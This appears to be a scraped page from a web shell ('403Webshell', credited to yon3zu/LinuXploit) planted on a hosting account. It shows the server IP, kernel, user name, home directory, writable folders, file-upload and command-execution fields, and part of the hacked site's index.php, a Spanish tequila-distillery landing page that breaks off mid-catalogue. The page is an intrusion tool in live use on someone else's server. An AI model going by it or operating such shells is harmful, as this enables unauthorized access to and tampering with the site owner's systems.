403Webshell
Server IP : 162.253.224.18  /  Your IP : 216.73.217.81
Web Server : Apache
System : Linux s18.infinitysrv.com 3.10.0-962.3.2.lve1.5.89.el7.x86_64 #1 SMP Thu Jul 9 15:55:31 UTC 2026 x86_64
User : dejavumk ( 1184)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/dejavumk/tequilacofradia.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/dejavumk/tequilacofradia.com/index.php
<!DOCTYPE html>
<html lang="es-MX">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Tequila-Cofradia | Orgullo y Tradición de Jalisco</title>
    <!-- Tailwind CSS para un diseño responsivo y moderno -->
    <script src="https://tailwindcss.com"></script>
    <!-- Google Fonts para tipografías elegantes y de alta gama -->
    <link rel="preconnect" href="https://googleapis.com">
    <link rel="preconnect" href="https://gstatic.com" crossorigin>
    <link href="https://googleapis.com/css2?family=Cinzel:wght@500;700;900&family=Montserrat:wght@300;400;600;700&display=swap" rel="stylesheet">
    <style>
        body {
            font-family: 'Montserrat', sans-serif;
        }
        .serif-brand {
            font-family: 'Cinzel', serif;
        }
    </style>
</head>
<body class="bg-neutral-950 text-neutral-200 min-h-screen flex flex-col justify-between selection:bg-amber-600 selection:text-neutral-950 antialiased">

    <!-- Navegación Superior -->
    <header class="border-b border-neutral-900 bg-neutral-950/80 backdrop-blur-md sticky top-0 z-50">
        <div class="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8 h-20 flex items-center justify-between">
            <div class="flex flex-col">
                <span class="serif-brand text-xl font-bold tracking-widest text-amber-500">LA COFRADÍA</span>
                <span class="text-[9px] tracking-[0.3em] text-neutral-500 uppercase -mt-1">Destilería Artesanal • Tequila, Jal.</span>
            </div>
            <nav class="hidden md:flex space-x-8 text-xs uppercase tracking-widest font-semibold">
                <a href="#inicio" class="text-amber-500 transition-colors">Inicio</a>
                <a href="#historia" class="hover:text-amber-400 transition-colors">Nuestra Herencia</a>
                <a href="#coleccion" class="hover:text-amber-400 transition-colors">Variedades</a>
                <a href="#proceso" class="hover:text-amber-400 transition-colors">El Proceso</a>
            </nav>
            <div>
                <a href="#coleccion" class="border border-amber-500/40 text-amber-400 text-xs uppercase tracking-widest px-4 py-2 hover:bg-amber-500 hover:text-neutral-950 font-bold transition-all duration-300">
                    Ver Catálogo
                </a>
            </div>
        </div>
    </header>

    <!-- Sección Hero / Bienvenida -->
    <section id="inicio" class="relative py-24 md:py-36 bg-gradient-to-b from-neutral-900 to-neutral-950 border-b border-neutral-900 overflow-hidden">
        <div class="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8 text-center relative z-10">
            <span class="text-xs uppercase tracking-[0.4em] text-amber-500 font-bold mb-4 block">100% Agave Azul Seleccionado</span>
            <h1 class="serif-brand text-4xl sm:text-5xl md:text-7xl font-black tracking-wide text-white mb-6">
                Tequila Cofradía
            </h1>
            <p class="max-w-2xl mx-auto text-neutral-400 text-sm md:text-base font-light leading-relaxed mb-10">
                Nacido de la tierra volcánica de Jalisco y madurado bajo el sol de México. Una cofradía de maestros tequileros dedicados a preservar el alma y el fuego del auténtico elixir mexicano.
            </p>
            <div class="flex flex-col sm:flex-row justify-center items-center gap-4">
                <a href="#coleccion" class="w-full sm:w-auto bg-amber-500 text-neutral-950 font-bold uppercase text-xs tracking-widest px-8 py-4 hover:bg-amber-400 transition-all duration-300 shadow-lg shadow-amber-500/10">
                    Explorar Colección
                </a>
                <a href="#proceso" class="w-full sm:w-auto border border-neutral-800 bg-neutral-900/40 text-white font-semibold uppercase text-xs tracking-widest px-8 py-4 hover:bg-neutral-800 transition-all duration-300">
                    Nuestra Tradición
                </a>
            </div>
        </div>
        <!-- Resplandor ambiental de fondo -->
        <div class="absolute inset-0 opacity-10 flex items-center justify-center pointer-events-none">
            <div class="w-[600px] h-[600px] rounded-full bg-amber-600 blur-[160px]"></div>
        </div>
    </section>

    <!-- Sección de Introducción Institucional -->
    <section id="historia" class="py-20 max-w-7xl mx-auto px-4 sm:px-6 lg:px-8">
        <div class="grid grid-cols-1 lg:grid-cols-2 gap-12 items-center">
            <div class="space-y-6">
                <span class="text-xs uppercase tracking-[0.3em] text-amber-500 font-bold block">Legado Familiar</span>
                <h2 class="serif-brand text-3xl md:text-4xl font-bold text-white">Medio Siglo de Maestría</h2>
                <p class="text-neutral-400 text-sm font-light leading-relaxed">
                    En La Cofradía entendemos que hacer tequila no es una industria, es un arte místico. Ubicados en un paisaje agavero histórico, compartimos con orgullo el sabor original de nuestra tierra a través de botellas que reflejan la identidad cultural de México.
                </p>
                <div class="p-4 bg-neutral-900/60 border-l-2 border-amber-500 text-neutral-300 text-xs italic font-light">
                    "Compartir un Tequila Cofradía es celebrar la hermandad y brindar con la esencia viva de Jalisco."
                </div>
            </div>
            <div class="bg-neutral-900 border border-neutral-800 p-8 rounded-sm text-center">
                <div class="w-20 h-20 bg-amber-500/10 border border-amber-500/20 rounded-full flex items-center justify-center mx-auto mb-4 text-amber-400 font-bold text-sm tracking-wider">
                    CRT
                </div>
                <h4 class="text-sm font-bold text-white uppercase tracking-wider mb-2">Autenticidad y Origen</h4>
                <p class="text-neutral-400 text-xs font-light max-w-sm mx-auto mb-4">
                    Cada una de nuestras expresiones está certificada bajo las más estrictas normas del Consejo Regulador del Tequila.
                </p>
                <span class="text-neutral-500 text-xs font-mono uppercase tracking-widest block">NOM 1137 CRT</span>
            </div>
        </div>
    </section>

    <!-- Catálogo de Ejemplos de Tequila -->
    <section id="coleccion" class="py-20 bg-neutral-900/30 border-y border-neutral-900">
        <div class="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8">
            <div class="text-center mb-16">
                <h2 class="serif-brand text-3xl md:text-4xl font-bold tracking-wide text-white mb-3">
                    Nuestras Expresiones
                </h2>
                <div class="w-16 h-0.5 bg-amber-500 mx-auto mb-4"></div>
                <p class="text-neutral-400 text-xs md:text-sm max-w-md mx-auto font-light">
                    Descubre el balance perfecto de sabor, aroma y cuerpo en cada una de nuestras variedades exclusivas.
                </p>
            </div>

            <!-- Grilla de Productos -->
            <div class="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-4 gap-8">
                
                <!-- 1. Tequila Blanco -->
                <div class="bg-neutral-900 border border-neutral-800/80 p-5 flex flex-col justify-between group hover:border-neutral-700 transition-all duration-300">
                    <div>
                        <div class="mb-5 relative bg-neutral-950 p-4 flex justify-center items-center h-64 border border-neutral-800 overflow-hidden">
                            <img src="https://placehold.co" alt="Tequila Cofradía Blanco" class="h-full object-contain group-hover:scale-105 transition-transform duration-500">
                            <span class="absolute top-2 right-2 bg-neutral-900 text-[9px] uppercase font-bold tracking-wider px-2 py-0.5 text-neutral-400 border border-neutral-800">Cristalino</span>
                        </div>
                        <span class="text-[10px] uppercase tracking-widest text-amber-500 font-bold block mb-1">Puro de Agave</span>
                        <h3 class="serif-brand text-lg font-bold text-white mb-2">Cofradía Blanco</h3>
                        <p class="text-neutral-400 text-xs font-light leading-relaxed mb-4">
                            Embotellado directamente después de la destilación. Captura las notas más puras del agave cocido, con destellos cítricos, matices herbales frescos y un toque sutil de pimienta.
                        </p>
                    </div>
                    <div class="border-t border-neutral-800/60 pt-4 mt-auto">
                        <span class="text-neutral-500 uppercase tracking-wider block text-[9px] font-bold mb-1">Maridaje Perfecto:</span>
                        <p class="text-[11px] text-neutral-400 font-medium">Ceviches, mariscos frescos y cocina mexicana ligera.</p>
                    </div>
                </div>

                <!-- 2. Tequila Reposado -->
                <div class="bg-neutral-900 border border-neutral-800/80 p-5 flex flex-col justify-between group hover:border-neutral-700 transition-all duration-300">
                    <div>
                        <div class="mb-5 relative bg-neutral-950 p-4 flex justify-center items-center h-64 border border-neutral-800 overflow-hidden">
                            <img src="https://placehold.co" alt="Tequila Cofradía Reposado" class="h-full object-contain group-hover:scale-105 transition-transform duration-500">
                            <span class="absolute top-2 right-2 bg-amber-950/40 text-[9px] uppercase font-bold tracking-wider px-2 py-0.5 text-amber-400 border border-amber-900/30">6 Meses</span>
                        </div>
                        <span class="text-[10px] uppercase tracking-widest text-amber-500 font-bold block mb-1">Maduración Noble</span>

Youez - 2016 - github.com/yon3zu
LinuXploit